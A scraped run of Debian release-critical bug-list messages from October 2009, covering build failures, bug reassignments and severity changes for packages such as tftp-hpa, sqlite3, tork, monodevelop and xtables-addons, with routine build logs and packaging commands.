Your message dated Sun, 25 Oct 2009 13:45:15 +0100 with message-id 4ae4485b.5040...@debian.org and subject line has caused the Debian Bug report #548464, regarding tftp-hpa: FTBFS: Missing build-depends on quilt to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 548464: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=548464 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Source: tftp-hpa Version: 5.0-6 Severity: serious Hi, There was an error while trying to autobuild your package: Start Time: 20090921-1938 [...] Build-Depends: debhelper (= 7), autotools-dev, libwrap0-dev, po-debconf [...] Toolchain package versions: libc6-dev_2.9-26 linux-libc-dev_2.6.30-6 g++-4.3_4.3.4-3 gcc-4.3_4.3.4-3 binutils_2.19.91.20090910-1 libstdc++6_4.4.1-4 libstdc++6-4.3-dev_4.3.4-3 [...] /usr/bin/fakeroot debian/rules clean dh clean --with quilt dh: unable to load addon quilt: Can't locate Debian/Debhelper/Sequence/quilt.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.0 /usr/local/share/perl/5.10.0 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at (eval 8) line 2. BEGIN failed--compilation aborted at (eval 8) line 2. make: *** [clean] Error 1 dpkg-buildpackage: error: /usr/bin/fakeroot debian/rules clean gave error exit status 2 A full build log can be found at: http://buildd.debian.org/build.php?arch=amd64pkg=tftp-hpaver=5.0-6 Kurt ---End Message--- ---BeginMessage--- Version: 5.0-7 -- Address:Daniel Baumann, Burgunderstrasse 3, CH-4562 Biberist Email: daniel.baum...@panthera-systems.net Internet: http://people.panthera-systems.net/~daniel-baumann/ ---End Message---
Bug#547557: akonadi-server claims dbus not active
Check whether $DBUS_SESSION_BUS_ADDRESS is set in the session you are executing akonadictl in. Also, it might be a good idea not to run a full KDE session as root. Cheers, Kevin signature.asc Description: This is a digitally signed message part.
Processed: reassign 552307 to gnome-bluetooth
Processing commands for cont...@bugs.debian.org: reassign 552307 gnome-bluetooth Bug #552307 [gnome-blueeoth] gnome-bluetooth: Build process relies on network availability Warning: Unknown package 'gnome-blueeoth' Bug reassigned from package 'gnome-blueeoth' to 'gnome-bluetooth'. Bug No longer marked as found in versions 2.28.3-1. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552312: xserver-xorg-core: Attaching X stdout/stderr
Package: xserver-xorg-core Version: 2:1.7.0-1 Severity: normal - X.log --- X.Org X Server 1.7.0 Release Date: 2009-10-2 X Protocol Version 11, Revision 0 Build Operating System: Linux 2.6.30-2-amd64 x86_64 Debian Current Operating System: Linux heretic 2.6.30-2-amd64 #1 SMP Fri Sep 25 22:16:56 UTC 2009 x86_64 Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.30-2-amd64 root=UUID=ae7d5095-c8b3-4205-af0e-032b0e124ec3 ro quiet noresume Build Date: 04 October 2009 02:08:02PM xorg-server 2:1.7.0-1 (jcris...@debian.org) Current version of pixman: 0.16.2 Before reporting problems, check http://wiki.x.org to make sure that you have the latest version. Markers: (--) probed, (**) from config file, (==) default setting, (++) from command line, (!!) notice, (II) informational, (WW) warning, (EE) error, (NI) not implemented, (??) unknown. (==) Log file: /var/log/Xorg.0.log, Time: Sun Oct 25 15:05:27 2009 (==) Using config file: /etc/X11/xorg.conf XRANDR name: DVI-1 Connector: DVI-I CRT1: INTERNAL_KLDSCP_DAC1 DFP1: INTERNAL_KLDSCP_TMDS1 DDC reg: 0x7e40 XRANDR name: DVI-0 Connector: DVI-I CRT2: INTERNAL_KLDSCP_DAC2 DFP3: INTERNAL_LVTM1 DDC reg: 0x7e50 finished output detect: 0 finished output detect: 1 finished all detect before xf86InitialConfiguration Output DFP1 disable success Blank CRTC 0 success Disable CRTC 0 success Output DFP3 disable success Blank CRTC 1 success Disable CRTC 1 success Output DFP1 disable success Output DFP3 disable success Blank CRTC 0 success Disable CRTC 0 success Blank CRTC 1 success Disable CRTC 1 success Output DFP1 disable success Blank CRTC 0 success Disable CRTC 0 success Mode 1024x768 - 1312 800 5 freq: 7875 best_freq: 7875 best_feedback_div: 70 best_frac_feedback_div: 0 best_ref_div: 2 best_post_div: 12 Set CRTC 0 PLL success Set CRTC Timing success Set CRTC 0 Overscan success Not using RMX scaler 0 setup success Set CRTC 0 Source success crtc 0 YUV disable setup success Output digital setup success Output DFP1 enable success Enable CRTC 0 success Unblank CRTC 0 success Blank CRTC 0 success Disable CRTC 0 success Lock CRTC 0 success Output DFP1 disable success Output DFP3 disable success Blank CRTC 1 success Disable CRTC 1 success Mode 1024x768 - 1344 806 10 freq: 6500 best_freq: 6500 best_feedback_div: 325 best_frac_feedback_div: 0 best_ref_div: 9 best_post_div: 15 Set CRTC 1 PLL success Set CRTC Timing success Set CRTC 1 Overscan success Not using RMX scaler 1 setup success Set CRTC 1 Source success crtc 1 YUV disable setup success Output digital setup success Enable CRTC 0 success Unblank CRTC 0 success Unlock CRTC 0 success Output DFP1 enable success Output DFP3 enable success Enable CRTC 1 success Unblank CRTC 1 success Blank CRTC 1 success Disable CRTC 1 success Lock CRTC 1 success Output DFP3 disable success Output DFP1 disable success Blank CRTC 0 success Disable CRTC 0 success Mode 1024x768 - 1312 800 5 freq: 7875 best_freq: 7875 best_feedback_div: 70 best_frac_feedback_div: 0 best_ref_div: 2 best_post_div: 12 Set CRTC 0 PLL success Set CRTC Timing success Set CRTC 0 Overscan success Not using RMX scaler 0 setup success Set CRTC 0 Source success crtc 0 YUV disable setup success Output digital setup success Enable CRTC 1 success Unblank CRTC 1 success Unlock CRTC 1 success Output DFP3 enable success Output DFP1 enable success Enable CRTC 0 success Unblank CRTC 0 success Blank CRTC 0 success Disable CRTC 0 success Lock CRTC 0 success Output DFP1 disable success Output DFP3 disable success Blank CRTC 1 success Disable CRTC 1 success Mode 1024x768 - 1344 806 10 freq: 6500 best_freq: 6500 best_feedback_div: 325 best_frac_feedback_div: 0 best_ref_div: 9 best_post_div: 15 Set CRTC 1 PLL success Set CRTC Timing success Set CRTC 1 Overscan success Not using RMX scaler 1 setup success Set CRTC 1 Source success crtc 1 YUV disable setup success Output digital setup success Enable CRTC 0 success Unblank CRTC 0 success Unlock CRTC 0 success Output DFP1 enable success Output DFP3 enable success Enable CRTC 1 success Unblank CRTC 1 success SELinux: Disabled on system, not enabling in X server record: RECORD extension enabled at configure time. record: This extension is known to be broken, disabling extension now.. record: http://bugs.freedesktop.org/show_bug.cgi?id=20500 expected keysym, got XF86Battery: line 59 of inet expected keysym, got XF86WLAN: line 60 of inet expected keysym, got XF86Suspend: line 174 of inet expected keysym, got XF86Battery: line 205 of inet expected keysym, got XF86Bluetooth: line 206 of inet expected keysym, got XF86WLAN: line 207 of inet expected keysym, got XF86Hibernate: line 214 of inet Output DFP1 disable success Blank CRTC 0 success Disable CRTC 0 success Output DFP3 disable success Blank CRTC 1 success Disable CRTC 1 success Mode 1280x1024 - 1688 1066 5 freq: 10800 best_freq: 10800 best_feedback_div: 72 best_frac_feedback_div: 0 best_ref_div: 2
Bug#552307: not a package's issue
severity 552307 normal thanks hi, I locally made a test and I tried to build the package *without* network access and it built fine. Therefore it's not a gnome-bluetooth issue, but a buildd one. I'm decreasing bug importance since, as I said, this is not a real package's issue. ia64 buildd configuration should be double-checked IMHO. Andrea -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: not a package's issue
Processing commands for cont...@bugs.debian.org: severity 552307 normal Bug #552307 [gnome-bluetooth] gnome-bluetooth: Build process relies on network availability Severity set to 'normal' from 'serious' thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552304: FTBFS on PPC and mips
* Laurent Bigonville: Looks like sqlite3 FTBFS on powerpc and mips both with the same error: /usr/bin/install -c -m 0644 pkgIndex.tcl /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3 chrpath -d ./debian/tmp/usr/share/tcltk/tcl8.5/sqlite3/libtclsqlite3.so Which Tcl versions are installed when you attempt the build? -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552304: FTBFS on PPC and mips
Le Sun, 25 Oct 2009 14:53:04 +0100, Florian Weimer f...@deneb.enyo.de a écrit : * Laurent Bigonville: Looks like sqlite3 FTBFS on powerpc and mips both with the same error: /usr/bin/install -c -m 0644 pkgIndex.tcl /build/buildd/sqlite3-3.6.19/debian/tmp//usr/share/tcltk/tcl8.4/sqlite3 chrpath -d ./debian/tmp/usr/share/tcltk/tcl8.5/sqlite3/libtclsqlite3.so Which Tcl versions are installed when you attempt the build? The full log is here: https://buildd.debian.org/fetch.cgi?pkg=sqlite3arch=powerpcver=3.6.19-2stamp=1256301261file=logas=raw Looks like tcl8.4 still installed [...] checking for tclsh8.4... tclsh8.4 [...] Laurent -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#529908: Upstream Fix
On 2009-10-19 Robert Hogan rob...@roberthogan.net wrote: Is there any way the reporter or an interested packager could check the fix for this in upstream CVS: http://sourceforge.net/mailarchive/message.php?msg_name=e1mlhzt-aq...@ddv4jf1.ch3.sourceforge.com Once validated, I can perform a release - or alternatively the patch can be applied to the tork package. Hello, I think that generally the fix is correct. However I do not seem to able to make *any* changes to the build system and getting a compileable setup. Even a simple make -f Makefile.cvs ; ./configure ; make fails with if /bin/bash ../../libtool --silent --tag=CC --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I../.. -DQT_THREAD_SUPPORT -D_REENTRANT -Wall -MT dead_pool.lo -MD -MP -MF .deps/dead_pool.Tpo -c -o dead_pool.lo dead_pool.c; \ then mv -f .deps/dead_pool.Tpo .deps/dead_pool.Plo; else rm -f .deps/dead_pool.Tpo; exit 1; fi /bin/bash ../../libtool --silent --tag=CC --mode=link gcc -Wall -o libtorksocks.la -rpath /usr/lib/tork -version-info 1:0:0 tsocks.lo common.lo parser.lo dead_pool.lo -ldl gcc: libtorksocks.so.1: No such file or directory gcc: unrecognized option '-soname' make[3]: *** [libtorksocks.la] Error 1 make[3]: Leaving directory `/tmp/TORK/tork-0.31/src/tsocks' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/tmp/TORK/tork-0.31/src' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/tmp/TORK/tork-0.31' make: *** [all] Error 2 I think this is caused by mixing old ltmain.sh in ./admin with new libtool.m4 in /usr/share/ or something like that. The aclocal run triggered by make -f Makefile.cvs throws loads of errors and warnings: SID)ametz...@argenau:/tmp/TORK/tork-0.31$ make -f Makefile.cvs This Makefile is only for the CVS repository This will be deleted before making the distribution *** automake (GNU automake) 1.9.6 found. *** Creating acinclude.m4 make[2]: Entering directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating list of subdirectories make[2]: Entering directory `/tmp/TORK/tork-0.31' cd . make -f admin/Makefile.common subdirs make[3]: Entering directory `/tmp/TORK/tork-0.31' make[3]: Leaving directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating configure.files *** Creating configure.in make[2]: Entering directory `/tmp/TORK/tork-0.31' cd . make -f admin/Makefile.common configure.in ; make[3]: Entering directory `/tmp/TORK/tork-0.31' make[3]: Leaving directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating aclocal.m4 configure.in:51: warning: AC_REQUIRE: `AC_PROG_CC' was expanded before it was required ../../lib/autoconf/c.m4:433: AC_LANG_COMPILER(C) is expanded from... ../../lib/autoconf/lang.m4:315: AC_LANG_COMPILER_REQUIRE is expanded from... ../../lib/autoconf/general.m4:2593: AC_COMPILE_IFELSE is expanded from... ../../lib/autoconf/general.m4:2601: AC_TRY_COMPILE is expanded from... acinclude.m4:2978: KDE_CHECK_FOR_BAD_COMPILER is expanded from... acinclude.m4:3059: AC_CHECK_COMPILERS is expanded from... configure.in:51: the top level configure.in:51: warning: AC_REQUIRE: `AC_PROG_CXX' was expanded before it was required ../../lib/autoconf/c.m4:671: AC_LANG_COMPILER(C++) is expanded from... ../../lib/autoconf/general.m4:2665: AC_LINK_IFELSE is expanded from... ../../lib/autoconf/general.m4:2674: AC_TRY_LINK is expanded from... ../../lib/m4sugar/m4sh.m4:620: AS_IF is expanded from... ../../lib/autoconf/general.m4:2018: AC_CACHE_VAL is expanded from... acinclude.m4:2903: KDE_CHECK_COMPILER_FLAG is expanded from... configure.in:54: warning: AC_REQUIRE: `AC_OBJEXT' was expanded before it was required acinclude.m4:6067: AC_LIBTOOL_SETUP is expanded from... acinclude.m4:6047: _AC_PROG_LIBTOOL is expanded from... acinclude.m4:6012: AC_PROG_LIBTOOL is expanded from... acinclude.m4:11781: AM_PROG_LIBTOOL is expanded from... acinclude.m4:3472: KDE_PROG_LIBTOOL is expanded from... configure.in:54: the top level configure.in:54: warning: AC_REQUIRE: `AC_EXEEXT' was expanded before it was required configure.in:54: warning: AC_CACHE_VAL(lt_prog_compiler_static_works, ...): suspicious cache-id, must contain _cv_ to be cached [...] cu andreas -- `What a good friend you are to him, Dr. Maturin. His other friends are so grateful to you.' `I sew his ears on from time to time, sure' -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552304: FTBFS on PPC and mips
* Laurent Bigonville: Looks like tcl8.4 still installed [...] checking for tclsh8.4... tclsh8.4 [...] Thanks. Either the package must override the ./configure logic, or build-conflict with tcl8.4(-dev). -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#533989: marked as done (monodevelop: FTBFS: error CS0006: cannot find metadata file `Mono.Data')
Your message dated Sun, 25 Oct 2009 15:24:15 +0100 with message-id 20091025152415.7bcb3...@redbull and subject line RE: monodevelop: FTBFS: error CS0006: cannot find metadata file `Mono.Data' has caused the Debian Bug report #533989, regarding monodevelop: FTBFS: error CS0006: cannot find metadata file `Mono.Data' to be marked as done. This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what this message is talking about, this may indicate a serious mail system misconfiguration somewhere. Please contact ow...@bugs.debian.org immediately.) -- 533989: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=533989 Debian Bug Tracking System Contact ow...@bugs.debian.org with problems ---BeginMessage--- Package: monodevelop Version: 2.0+dfsg-2 Severity: serious User: debian...@lists.debian.org Usertags: qa-ftbfs-20090620 qa-ftbfs Justification: FTBFS on amd64 Hi, During a rebuild of all packages in sid, your package failed to build on amd64. Relevant part: make[4]: Entering directory `/build/user-monodevelop_2.0+dfsg-2-amd64-pWkU8c/monodevelop-2.0+dfsg/src/core/MonoDevelop.Projects' /usr/bin/csc -debug -codepage:utf8 -warnaserror -debug -out:../../../build/bin/MonoDevelop.Projects.dll -target:library -r:/usr/lib/cli/mono-addins-0.2/Mono.Addins.dll /r:/usr/lib/mono/monodoc/monodoc.dll -r:Mono.Data -r:Mono.Data.Sqlite -r:Mono.Data.SqliteClient -r:Mono.Posix -r:System -r:System.Core -r:System.Data -r:System.Drawing -r:System.Xml -r:../../../build/bin/Mono.Cecil.dll -r:../../../build/bin/Mono.Cecil.Mdb.dll -r:../../../build/bin/MonoDevelop.Core.dll /resource:./md1format.xml /resource:./MonoDevelop.Projects.addin.xml ./AssemblyInfo.cs ./MonoDevelop.Projects.CodeGeneration/BaseRefactorer.cs ./MonoDevelop.Projects.CodeGeneration/CodeRefactorer.cs ./MonoDevelop.Projects.CodeGeneration/IRefactorer.cs ./MonoDevelop.Projects.CodeGeneration/RefactorerContext.cs ./MonoDevelop.Projects.CodeGeneration/RefactorOperations.cs ./MonoDevelop.Projects.CodeGeneration/XmlCodeDomReader.cs ./MonoDevelop.Projects.Dom.Database/CodeCompletionDatabase.cs ./MonoDevelop.Projects.Dom.Database/DatabaseColumnAttribute.cs ./MonoDevelop.Projects.Dom.Database/DatabaseEvent.cs ./MonoDevelop.Projects.Dom.Database/DatabaseField.cs ./MonoDevelop.Projects.Dom.Database/DatabaseMethod.cs ./MonoDevelop.Projects.Dom.Database/DatabaseParameter.cs ./MonoDevelop.Projects.Dom.Database/DatabaseProjectDom.cs ./MonoDevelop.Projects.Dom.Database/DatabaseProperty.cs ./MonoDevelop.Projects.Dom.Database/DatabaseType.cs ./MonoDevelop.Projects.Dom.Database/DateTimeUtil.cs ./MonoDevelop.Projects.Dom.Database/HyenaSqliteCommand.cs ./MonoDevelop.Projects.Dom.Database/HyenaSqliteConnection.cs ./MonoDevelop.Projects.Dom.Database/MonoDevelopDatabaseConnection.cs ./MonoDevelop.Projects.Dom.Database/SqliteUtils.cs ./MonoDevelop.Projects.Dom.Output/Ambience.cs ./MonoDevelop.Projects.Dom.Output/AmbienceService.cs ./MonoDevelop.Projects.Dom.Output/DocumentationService.cs ./MonoDevelop.Projects.Dom.Output/NetAmbience.cs ./MonoDevelop.Projects.Dom.Output/OutputFlags.cs ./MonoDevelop.Projects.Dom.Output/OutputSettings.cs ./MonoDevelop.Projects.Dom.Parser/AbstractParser.cs ./MonoDevelop.Projects.Dom.Parser/AssemblyInformationEventHandler.cs ./MonoDevelop.Projects.Dom.Parser/CommentTag.cs ./MonoDevelop.Projects.Dom.Parser/CommentTasksChangedEventHandler.cs ./MonoDevelop.Projects.Dom.Parser/IParser.cs ./MonoDevelop.Projects.Dom.Parser/IParserDatabase.cs ./MonoDevelop.Projects.Dom.Parser/IResolver.cs ./MonoDevelop.Projects.Dom.Parser/ITypeNameResolver.cs ./MonoDevelop.Projects.Dom.Parser/ProjectDom.cs ./MonoDevelop.Projects.Dom.Parser/ProjectDomEventArgs.cs ./MonoDevelop.Projects.Dom.Parser/ProjectDomService.cs ./MonoDevelop.Projects.Dom.Parser/TypeNameResolver.cs ./MonoDevelop.Projects.Dom.Parser/TypeResolverVisitor.cs ./MonoDevelop.Projects.Dom.Serialization/AssemblyCodeCompletionDatabase.cs ./MonoDevelop.Projects.Dom.Serialization/ClassEntry.cs ./MonoDevelop.Projects.Dom.Serialization/ClassInformationEventHandler.cs ./MonoDevelop.Projects.Dom.Serialization/CodeCompletionDatabase.cs ./MonoDevelop.Projects.Dom.Serialization/DatabaseProjectDom.cs ./MonoDevelop.Projects.Dom.Serialization/DomPersistence.cs ./MonoDevelop.Projects.Dom.Serialization/DomTypeProxy.cs ./MonoDevelop.Projects.Dom.Serialization/FileEntry.cs ./MonoDevelop.Projects.Dom.Serialization/IParserService.cs ./MonoDevelop.Projects.Dom.Serialization/NamespaceEntry.cs ./MonoDevelop.Projects.Dom.Serialization/ParserDatabase.cs ./MonoDevelop.Projects.Dom.Serialization/ProjectCodeCompletionDatabase.cs ./MonoDevelop.Projects.Dom.Serialization/SimpleCodeCompletionDatabase.cs
Processed: reassign 552094 to kde-style-skulpture
Processing commands for cont...@bugs.debian.org: reassign 552094 kde-style-skulpture Bug #552094 [qt4-designer] [qt4-designer] Crash on Marble plugins loading Bug reassigned from package 'qt4-designer' to 'kde-style-skulpture'. Bug No longer marked as found in versions qt4-x11/4:4.5.3-4. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#529908: Upstream Fix
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Andreas Metzler schrieb: On 2009-10-19 Robert Hogan rob...@roberthogan.net wrote: Is there any way the reporter or an interested packager could check the fix for this in upstream CVS: http://sourceforge.net/mailarchive/message.php?msg_name=e1mlhzt-aq...@ddv4jf1.ch3.sourceforge.com Once validated, I can perform a release - or alternatively the patch can be applied to the tork package. Hello, I think that generally the fix is correct. However I do not seem to able to make *any* changes to the build system and getting a compileable setup. Even a simple make -f Makefile.cvs ; ./configure ; make fails with Hello, yes I talked to Robert in private the last days and I have got exactly the same error, he is working on it. if /bin/bash ../../libtool --silent --tag=CC --mode=compile gcc -DHAVE_CONFIG_H -I. -I. -I../.. -DQT_THREAD_SUPPORT -D_REENTRANT -Wall -MT dead_pool.lo -MD -MP -MF .deps/dead_pool.Tpo -c -o dead_pool.lo dead_pool.c; \ then mv -f .deps/dead_pool.Tpo .deps/dead_pool.Plo; else rm -f .deps/dead_pool.Tpo; exit 1; fi /bin/bash ../../libtool --silent --tag=CC --mode=link gcc -Wall -o libtorksocks.la -rpath /usr/lib/tork -version-info 1:0:0 tsocks.lo common.lo parser.lo dead_pool.lo -ldl gcc: libtorksocks.so.1: No such file or directory gcc: unrecognized option '-soname' make[3]: *** [libtorksocks.la] Error 1 make[3]: Leaving directory `/tmp/TORK/tork-0.31/src/tsocks' make[2]: *** [all-recursive] Error 1 make[2]: Leaving directory `/tmp/TORK/tork-0.31/src' make[1]: *** [all-recursive] Error 1 make[1]: Leaving directory `/tmp/TORK/tork-0.31' make: *** [all] Error 2 I think this is caused by mixing old ltmain.sh in ./admin with new libtool.m4 in /usr/share/ or something like that. The aclocal run triggered by make -f Makefile.cvs throws loads of errors and warnings: SID)ametz...@argenau:/tmp/TORK/tork-0.31$ make -f Makefile.cvs This Makefile is only for the CVS repository This will be deleted before making the distribution *** automake (GNU automake) 1.9.6 found. *** Creating acinclude.m4 make[2]: Entering directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating list of subdirectories make[2]: Entering directory `/tmp/TORK/tork-0.31' cd . make -f admin/Makefile.common subdirs make[3]: Entering directory `/tmp/TORK/tork-0.31' make[3]: Leaving directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating configure.files *** Creating configure.in make[2]: Entering directory `/tmp/TORK/tork-0.31' cd . make -f admin/Makefile.common configure.in ; make[3]: Entering directory `/tmp/TORK/tork-0.31' make[3]: Leaving directory `/tmp/TORK/tork-0.31' make[2]: Leaving directory `/tmp/TORK/tork-0.31' *** Creating aclocal.m4 configure.in:51: warning: AC_REQUIRE: `AC_PROG_CC' was expanded before it was required ../../lib/autoconf/c.m4:433: AC_LANG_COMPILER(C) is expanded from... ../../lib/autoconf/lang.m4:315: AC_LANG_COMPILER_REQUIRE is expanded from... ../../lib/autoconf/general.m4:2593: AC_COMPILE_IFELSE is expanded from... ../../lib/autoconf/general.m4:2601: AC_TRY_COMPILE is expanded from... acinclude.m4:2978: KDE_CHECK_FOR_BAD_COMPILER is expanded from... acinclude.m4:3059: AC_CHECK_COMPILERS is expanded from... configure.in:51: the top level configure.in:51: warning: AC_REQUIRE: `AC_PROG_CXX' was expanded before it was required ../../lib/autoconf/c.m4:671: AC_LANG_COMPILER(C++) is expanded from... ../../lib/autoconf/general.m4:2665: AC_LINK_IFELSE is expanded from... ../../lib/autoconf/general.m4:2674: AC_TRY_LINK is expanded from... ../../lib/m4sugar/m4sh.m4:620: AS_IF is expanded from... ../../lib/autoconf/general.m4:2018: AC_CACHE_VAL is expanded from... acinclude.m4:2903: KDE_CHECK_COMPILER_FLAG is expanded from... configure.in:54: warning: AC_REQUIRE: `AC_OBJEXT' was expanded before it was required acinclude.m4:6067: AC_LIBTOOL_SETUP is expanded from... acinclude.m4:6047: _AC_PROG_LIBTOOL is expanded from... acinclude.m4:6012: AC_PROG_LIBTOOL is expanded from... acinclude.m4:11781: AM_PROG_LIBTOOL is expanded from... acinclude.m4:3472: KDE_PROG_LIBTOOL is expanded from... configure.in:54: the top level configure.in:54: warning: AC_REQUIRE: `AC_EXEEXT' was expanded before it was required configure.in:54: warning: AC_CACHE_VAL(lt_prog_compiler_static_works, ...): suspicious cache-id, must contain _cv_ to be cached [...] cu andreas - -- /* Mit freundlichem Gruß / With kind regards, Patrick Matthäi GNU/Linux Debian Developer E-Mail: pmatth...@debian.org patr...@linux-dev.org Comment: Always if we think we are right, we were maybe wrong. */ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.10 (GNU/Linux) iEYEARECAAYFAkrkaFIACgkQ2XA5inpabMflJgCfWIvOX07unsRFEpabBn5wQJ8d La8AnRpwsXqSFjMYMEGzO2uvV/fzVVQE =HOVX -END PGP SIGNATURE- --
Processed: Re: Bug#552069: crashes of iceweasel when accessing the bookmarks
Processing commands for cont...@bugs.debian.org: # doing some clean up ... severity 546599 critical Bug #546599 [libsqlite3-0] iceweasel: sqlite3 crash when editing bookmarks Severity set to 'critical' from 'normal' severity 552069 critical Bug #552069 [libsqlite3-0] crashes of iceweasel when accessing the bookmarks Severity set to 'critical' from 'important' # critical becasue it makes unrelated software on the system break merge 552069 546599 Bug#546599: iceweasel: sqlite3 crash when editing bookmarks Bug#552069: crashes of iceweasel when accessing the bookmarks Merged 546599 552069. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: limit source to classpath, tagging 551253
Processing commands for cont...@bugs.debian.org: #classpath (2:0.98-5) UNRELEASED; urgency=low # # * Build against xulrunner-dev (= 1.9.1) (Closes: #551253). # limit source classpath Limiting to bugs with field 'source' containing at least one of 'classpath' Limit currently set to 'source':'classpath' tags 551253 + pending Bug #551253 [src:classpath] classpath: FTBFS: gcjwebplugin.cc:65:31: error: nsIPluginInstance.h: No such file or directory Added tag(s) pending. End of message, stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed (with 1 errors): Re: Bug#552069: crashes of iceweasel when accessing the bookmarks
Processing commands for cont...@bugs.debian.org: # merging in that direction was bad, the one bug contains much less # info unmerge 552069 546599 Unknown command or malformed arguments to command. merge 546599 552069 Bug#546599: iceweasel: sqlite3 crash when editing bookmarks Bug#552069: crashes of iceweasel when accessing the bookmarks Merged 546599 552069. thanks Stopping processing here. Please contact me if you need assistance. Debian bug tracking system administrator (administrator, Debian Bugs database) -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#552301: xtables-addons-source: package ships /lib/modules/$(uname -r)/modules.dep.bin
On Sun, Oct 25, 2009 at 12:05:46PM +0100, Michael Prokop wrote: Package: xtables-addons-source Version: 1.19-1 Severity: grave Justification: renders package unusable Note: choosing severity grave as I think it renders the package unusable, please feel free to downgrade if you think that it won't affect all users. Hi Michael, I can't reproduce this behavior: # m-a -k /usr/src/linux-headers-2.6.30-2-686 -l 2.6.30-2-686 build xtables-addons # dpkg -c /usr/src/xtables-addons-modules-2.6.30-2-686_1.19-1+2.6.30-8_i386.deb |grep 'modules\.' # (up to date sid) So maybe something has changed in the 2.6.31 build system ? Could you check that this also happens after removing /usr/src/modules/xtables-addons and retrying ? This could be caused by the previous (pre-1.19) build system of xtables-addons Anyway, I think I'll add commands to ensure this files are removed from the binary module. Regards, Pierre Problem: # apt-get install xtables-addons-modules-2.6.31-grml [...] Unpacking xtables-addons-modules-2.6.31-grml (from .../xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb) ... dpkg: error processing /var/cache/apt/archives/xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb (--unpack): trying to overwrite '/lib/modules/2.6.31-grml/modules.dep.bin', which is also in package linux-image-2.6.31-grml 0:grml.03 dpkg-deb: subprocess paste killed by signal (Broken pipe) Errors were encountered while processing: /var/cache/apt/archives/xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb [...] Reason: # dpkg -c xtables-addons-modules-2.6.31-grml_1.19-1+grml.03_i386.deb [...] -rw-r--r-- root/root 3778 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.dep.bin -rw-r--r-- root/root 2049 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.alias.bin -rw-r--r-- root/root 2230 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.dep -rw-r--r-- root/root 949 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.symbols.bin -rw-r--r-- root/root 846 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.symbols -rw-r--r-- root/root 1104 2009-10-23 12:31 ./lib/modules/2.6.31-grml/modules.alias The xtables-addons-modules-2.6.31-grml package was built running: # m-a -k /path/to/linux-2.6.31.5 -k 2.6.31-grml build xtables-addons Solution: Do not ship any modules.* files through the main /lib/modules/$(uname -r)/ directory. regards, -mika- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Processed: Re: Bug#552094: [qt4-designer] Crash on Marble plugins loading
